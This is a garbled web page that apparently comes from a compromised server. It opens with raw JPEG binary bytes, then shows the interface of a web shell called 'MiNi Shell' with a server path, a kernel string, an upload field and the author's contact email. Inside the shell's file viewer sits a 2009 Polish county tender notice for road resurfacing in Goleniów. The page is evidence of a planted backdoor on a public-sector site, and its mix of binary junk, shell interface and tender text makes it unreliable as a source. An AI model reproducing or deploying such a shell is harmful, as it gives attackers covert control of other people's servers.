JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090710/109575-N-2009.html

<p class="kh_header"><b>Goleniów: Odnowa nawierzchni bitumicznej na odcinkach dróg powiatowych nr 0039Z, 0716Z, 0727Z, 0701Z, 0854Z, 0758Z, 0760Z, 0754Z, 0756Z, 0765Z, 0743Z, 0746Z, 0749Z, 0853Z, 0747Z, 0734Z i 0731Z na terenie Powiatu Goleniowskiego</b><br>
<b>Numer ogłoszenia: 109575 - 2009; data zamieszczenia: 10.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Goleniowski , ul. Dworcowa 1, 72-100 Goleniów, woj. zachodniopomorskie, tel. 091 4180512, 4180361, faks 091 4182530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-goleniowski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnowa nawierzchni bitumicznej na odcinkach dróg powiatowych nr 0039Z, 0716Z, 0727Z, 0701Z, 0854Z, 0758Z, 0760Z, 0754Z, 0756Z, 0765Z, 0743Z, 0746Z, 0749Z, 0853Z, 0747Z, 0734Z i 0731Z na terenie Powiatu Goleniowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje odnowy nawierzchni bitumicznych poprzez wykonanie pojedynczych i podwójnych powierzchniowych utrwaleń oraz wyrównanie nawierzchni mieszanką mineralno-emulsyjną na zimno typu Slurry seal.
Wykonanie profilu z mieszanki mineralno-emulsyjnej GE na zimno z oczyszczeniem i skropieniem emulsją asfaltową warstwy dolnej na odcinkach dróg powiatowych nr 0039Z, 0716Z, 0727Z, 0701Z, 0854Z, 0758Z, 0760Z, 0754Z, 0756Z, 0765Z, 0743Z, 0746Z, 0749Z, 0853Z, 0747Z, 0734Z i 0731Z na terenie Powiatu Goleniowskiego w ilości:
- wykonanie profilu z mieszanki mineralno-emulsyjnej GE na zimno z oczyszczeniem i skropieniem emulsją asfaltową warstwy dolnej - 400,88 Mg;
- oczyszczenie i wyrównanie nawierzchni mieszanką mineralno - emulsyjną na zimno typu Slurry seal - 1925,48 Mg;
- wykonanie pojedynczego powierzchniowego utrwalenia nawierzchni bitumicznej emulsją asfaltową modyfikowaną K1-70MP z grysem kamiennym 5-8 mm wraz z oczyszczeniem nawierzchni - 61684 m2;
- podwójne powierzchniowe utrwalenia nawierzchni bitumicznej emulsją asfaltową modyfikowaną K1-70MP z grysem kamiennym 2-5 mm i 5-8 mm wraz                     z oczyszczeniem nawierzchni - 7600 m2.

2.   Ilość wbudowanych mieszanek typu GE i Slurry seal będzie każdorazowo potwierdzane przez inspektora nadzoru. 

Szczegółowy opis przedmiotu zamówienia stanowią przedmiar robót i specyfikacje techniczne wykonania i odbioru robót - Załącznik nr 11 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.     Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 40 000,00 zł.  (czterdzieści tysięcy złotych) przed upływem terminu składania ofert.

2.      Wadium może być wniesione w jednej lub kilku następujących formach:
a)  pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)  gwarancjach bankowych;
d)  gwarancjach ubezpieczeniowych;
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z poź. zm.).

3.     Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego  15 9375 0002 0000 0459 2000 0040 w Banku Spółdzielczym w Goleniowie 

(Uwaga! - przy wnoszeniu wadium przelewem, dokument polecenia dokonania przelewu nie jest dowodem wniesienia wadium); 

Dokumentem potwierdzającym dokonanie wpłaty wadium jest uznanie kwotą wadium rachunku Zamawiającego (wpływ środków na rachunek Zamawiającego przed upływem terminu składania ofert).

4.     Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w Wydziale Dróg Powiatowych, ul. Fabryczna 25, 72-100 Goleniów pokój nr 4. Gwarancja zapłaty wadium winna  być bezwarunkowa i płatna na pierwsze żądanie. 
      
Uwaga - termin ważności gwarancji nie może być krótszy niż termin związania ofertą, tj. 30 dni. 
5.      Potwierdzenie wniesienia wadium należy dołączyć do oferty.

6.      Zwrot wadium:
Zamawiający dokonuje zwrotu wadium z chwilą upływu terminu związania ofertą (art. 85 ust. 1 Prawa zamówień publicznych) oraz w pozostałych przypadkach wymienionych w art.46 ust. 1 i 2 Prawa zamówień publicznych. Zwrot wadium wniesionego w pieniądzu nastąpi zgodnie z art. 46 ust. 4 pzp.
7. Zatrzymanie wadium:
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
-  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
-  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:

1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

Spełnienie warunku:
- dostarczenie oświadczeń lub dokumentów opisanych w Części X pkt. 3,5,6 Specyfikacji Istotnych Warunków Zamówienia (SIWZ).  

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymienione powyżej powinny być przedłożone przez każdego Wykonawcę.

2.	Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
Spełnienie warunku:
 2.1. Wykonawca musi wykazać, że w okresie ostatnich 5 latach przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie;
- łącznie zrealizował (zakończył) roboty polegające na wykonaniu powierzchownego utrwalenia nawierzchni bitumicznej emulsją asfaltową modyfikowaną K1-70MP z grysem kamiennym na powierzchni nie mniejszej niż 150 000,00 m2
- wykonał wyrównanie lub ułożenie nawierzchni masą mineralno - emulsyjną na zimno typu Slurry seal na powierzchni łącznej nie mniejszej niż 150 000,00 m2
- wykonał profile z mieszanki mineralno-emulsyjnej typu GE na zimno na powierzchni łącznej nie mniejszej niż 10 000,00 m2, lub w ilości 1500 Mg.

2.2.  dysponowanie następującym sprzętem:
- kombajn do powierzchniowych utrwaleń - 1 szt.,
- szczotka mechaniczna - 1 szt.,
- walec ogumiony 8-10 Mg -1 szt.,
- kombajn do wytwarzania mieszanek na zimno z rozściełaczem- 1 szt.,

2.3. dysponowanie kierownikiem budowy posiadającym uprawnienia budowlane  w specjalności drogowej, posiadającym aktualne dokumenty potwierdzające przynależność do Okręgowej Izby Inżynierów Budownictwa i wymagane  ubezpieczenie od odpowiedzialności cywilnej,
   
3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 

Spełnienie warunku:
- posiadanie polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Spełnienie warunku:
 - nie podleganie wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych - w przypadku Wykonawców działających wspólnie (spółka cywilna, konsorcjum, itd.) dotyczy każdego współwykonawcy z osobna.

5.   Wniosą wadium w wysokości ustalonej przez Zamawiającego - ( Część XIII)

Spełnienie warunku:
 - uznanie kwotą wadium rachunku Zamawiającego lub złożenie oryginału dokumentu wadialnego w Wydziale Dróg Powiatowych - ul. Fabryczna 25; 72 - 100 Goleniów przed upływem terminu składania ofert.

6. Ustanowią, w przypadku gdy Wykonawcy wspólnie ubiegać się będą o udzielenie  zamówienia, pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

Umocowanie to powinno wynikać z treści umowy regulującej współpracę podmiotów występujących wspólnie lub z odrębnego dokumentu.

7.   Wykonawca wiodący (lider konsorcjum) musi spełniać warunek określony          w punkcie 5.
8.  Udzielą gwarancji i rękojmi na wykonane roboty, w tym na użyte materiały na okres nie krótszy niż 3 lata. Dokument gwarancji wystawiony zostanie niezwłocznie po odbiorze końcowym w formie i treści według Załącznika Nr 10 do SIWZ.

Spełnienie wymagania:
 - złożenie oświadczenia o oferowanych warunkach gwarancji 

9.  Wykonają przedmiot zamówienia w terminie do 16 października 2009r.

Spełnienie wymagania:
 -  złożenie oświadczenia o wykonaniu zamówienia w w/w  terminie.

10. Akceptują warunki i wymagania zawarte w niniejszej specyfikacji istotnych warunków zamówienia wraz z załącznikami i przyjmują je bez zastrzeżeń.

Spełnienie warunków i wymagań:
-  złożenie oświadczenia.

11. Złożą komplet wymaganych dokumentów - wymienionych w Części X..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wypełniony formularz ofertowy stanowiący kartę tytułową oferty (Załącznik Nr 1  do SIWZ).

2.Wyceniony przedmiar robót - (Załącznik Nr 2).

3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (w przypadku  przedsiębiorców występujących wspólnie - m.in. spółki cywilne, konsorcja  - zaświadczenie o wpisie do ewidencji działalności gospodarczej lub odpis z właściwego rejestru każdego ze wspólników) -  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

Jeżeli uprawnienie do reprezentacji nie wynika z ww. dokumentów konieczne jest złożenie pełnomocnictwa sporządzonego na Załączniku Nr 3 do SIWZ lub innego równoważnego. 

4.Oświadczenie  w  trybie Art. 22  ust. 1  ustawy Prawo zamówień publicznych   (Dz. U. z 2007 r. Nr 223, poz. 1655 zwanej dalej  pzp - (Załącznik Nr 4 do     SIWZ ).  
W przypadku wykonawców składających ofertę wspólnie (spółka cywilna, konsorcjum, itd.) każdy ze współwykonawców składa oświadczenia lub dokumenty  oddzielnie.  
5. Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca (w przypadku przedsiębiorców występujących wspólnie zaświadczenie  każdego ze wspólników) nie zalega z opłacaniem podatków lub zaświadczenie, że Wykonawca  uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonanie decyzji właściwego organu  -  wystawione  nie wcześniej  niż 3 miesiące  przed  upływem  terminu składania ofert. 

6. Aktualne  zaświadczenie  z  właściwego  oddziału  Zakładu  Ubezpieczeń  Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca (w przypadku przedsiębiorców występujących wspólnie zaświadczenie każdego ze wspólników) nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu  - wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert. 

7. Wykaz  wykonanych przez  Wykonawcę,  w ciągu ostatnich 5 lat,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
7.1. - robót polegających na wykonaniu powierzchownego utrwalenia nawierzchni bitumicznej emulsją asfaltową modyfikowaną K-1 70MP z grysem kamiennym na łącznej powierzchni nie mniejszej niż 150 000,00 m2 z podaniem  ich  wartości oraz daty i  miejsca  wykonania,
7.2. - robót polegających na wyrównaniu lub ułożeniu nawierzchni masą mineralno - emulsyjną na zimno typu Slurry seal na łącznej powierzchni nie mniejszej niż 150 000,00 m2 z podaniem  ich  wartości oraz daty  i  miejsca  wykonania,
7.3. - roboty polegające na wykonaniu profilu z mieszanki mineralno-emulsyjnej typu GE na zimno na łącznej powierzchni nie mniejszej niż 10 000,00 m2, lub w ilości 1500 Mg, z podaniem  ich  wartości oraz daty  i  miejsca  wykonania, (Załącznik Nr 5  do SIWZ).

7.4.	Dokumenty lub oświadczenia potwierdzające, że roboty te zostały wykonane należycie (referencje zamawiających, ewentualnie kopie protokółów odbioru).  

8. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca (Załącznik nr 6 do SIWZ). 

9.Wykaz osób (personelu technicznego), które będą wykonywać lub będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich  kwalifikacji  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności zbliżonych do funkcji w  przedmiocie zamówienia  (Załącznik Nr 7  do SIWZ).

9.1Kserokopie uprawnień budowlanych w/w osób, odpowiednie dla danej specjalności.   
    
9.2.Aktualne zaświadczenia o wpisie do Okręgowej Izby Inżynierów Budownictwa  i ubezpieczeniu od odpowiedzialności cywilnej.  

9.3 Oświadczenie o gotowości kierownika budowy do pełnienia tej funkcji w okresie realizacji niniejszego zamówienia lub oświadczenie Wykonawcy, że kierownik budowy jest jego pracownikiem etatowym (Załącznik nr 8 do SIWZ). 

10. Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

11. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa:

11.1) w pkt 3,5,6 - składa odpowiedni dokument lub dokumenty wystawione  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne  i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,

11.2) dokumenty, o których mowa w pkt 11.1) lit. a powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument,            o którym mowa w pkt 11.1) lit. b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

12. Jeżeli w kraju pochodzenia osoby lub w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt 11 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

13. Kopia wniesienia wadium.

14. Oświadczenia lub dokumenty o:
-  związaniu złożoną przez siebie ofertą przez okres 30 dni od daty upływu terminu  składania ofert;
-  zdobyciu informacji koniecznych do sporządzenia oferty;
-  zapoznaniu się oferenta z warunkami i wymaganiami w postępowaniu zawartymi  w niniejszej Specyfikacji Istotnych Warunków Zamówienia wraz z jej załącznikami i przyjęciu tych warunków oraz wymagań bez zastrzeżeń, a także  zobowiązaniu się do zawarcia umowy na warunkach określonych w projekcie umowy (Załącznik nr 9 do SIWZ);
-  udzieleniu gwarancji i rękojmi na przedmiot zamówienia oraz zapewnieniu  o gotowości usunięcia w okresie gwarancji awarii i usterek w określonym czasie (Załącznik nr 10 do SIWZ); 
- zleceniu części przedmiotu umowy Podwykonawcy,
-   terminie wykonania zamówienia;
- formie wniesienia zabezpieczenia należytego wykonania umowy;

Uwaga! Powyższe oświadczenia lub dokumenty należy złożyć na druku stanowiącym Załącznik Nr 1 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://spow.goleniow.ibip.pl/public/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Dróg Powiatowych w Goleniowie ul.Fabrycznej 25, 72-100 Goleniów, pok. nr 4..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2009 godzina 10:00, miejsce: w Sekretariacie Starostwa Powiatowego w Goleniowie, ul. Dworcowa 1, pok.121.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com